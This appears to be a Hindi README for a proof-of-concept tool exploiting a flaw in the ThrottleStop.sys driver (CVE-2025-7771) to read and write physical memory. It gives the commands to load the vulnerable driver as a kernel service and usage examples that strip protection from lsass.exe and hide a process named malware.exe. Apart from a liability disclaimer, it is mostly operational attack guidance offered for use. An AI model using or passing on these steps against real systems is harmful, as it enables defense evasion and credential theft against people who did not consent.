
ThrottleStop.sys ड्राइवर की कमज़ोरी को प्रदर्शित करने वाला एक सरल PoC, जो मनमानी भौतिक मेमोरी को पढ़ने और लिखने की क्षमताओं के साथ-साथ Superfetch का उपयोग करके वर्चुअल-से-भौतिक पता अनुवाद को भी दर्शाता है।
ThrottleStop.sys ड्राइवर में भेद्यता को प्रदर्शित करने वाला एक सरल PoC, जो मनमानी भौतिक मेमोरी पढ़ने और लिखने की क्षमताओं के साथ-साथ Superfetch का उपयोग करके वर्चुअल-से-भौतिक पता अनुवाद को भी दर्शाता है।
व्यवस्थापक विशेषाधिकारों के साथ cmd.exe लॉन्च करें, और binPath को भेद्य ड्राइवर के स्थान पर इंगित करते हुए "kernel" प्रकार के साथ एक कर्नेल ड्राइवर सेवा पंजीकृत करें।
> sc create ThrottleStop binPath= <path> type= kernel`
> sc start ThrottleStop
कमांड्स:
--protect : Protect a process.
--unprotect : Unprotect a potected process.
--hide : Hide a process.
--unhide : Unhide a process.
--help : Print help
उदाहरण:
CVE-2025-7771.exe --protect notepad.exe या CVE-2025-7771exe --protect 12345
CVE-2025-7771.exe --unprotect lsass.exe या CVE-2025-7771.exe --unprotect 12345
CVE-2025-7771.exe --hide malware.exe या CVE-2025-7771.exe --hide 12345
किसी छिपी हुई प्रक्रिया को फिर से दृश्यमान करने के लिए, आप '--eprocess' के साथ छिपी हुई प्रक्रिया का eprocess पता निर्दिष्ट करते हुए --unhide कमांड का उपयोग कर सकते हैं:
CVE-2025-7771.exe --unhide --eprocess 0xffffc207da1d9240
इस टूल का उपयोग करने से पहले उचित प्राधिकरण सुनिश्चित करना आपकी ज़िम्मेदारी है। लेखक दुरुपयोग के लिए कोई दायित्व नहीं मानता है।
यह एक चालू परियोजना है, योगदान और सुझावों का स्वागत है! यदि आपके पास विचार, सुधार हैं, या सहयोग करना चाहते हैं, तो बेझिझक संपर्क करें: [email protected]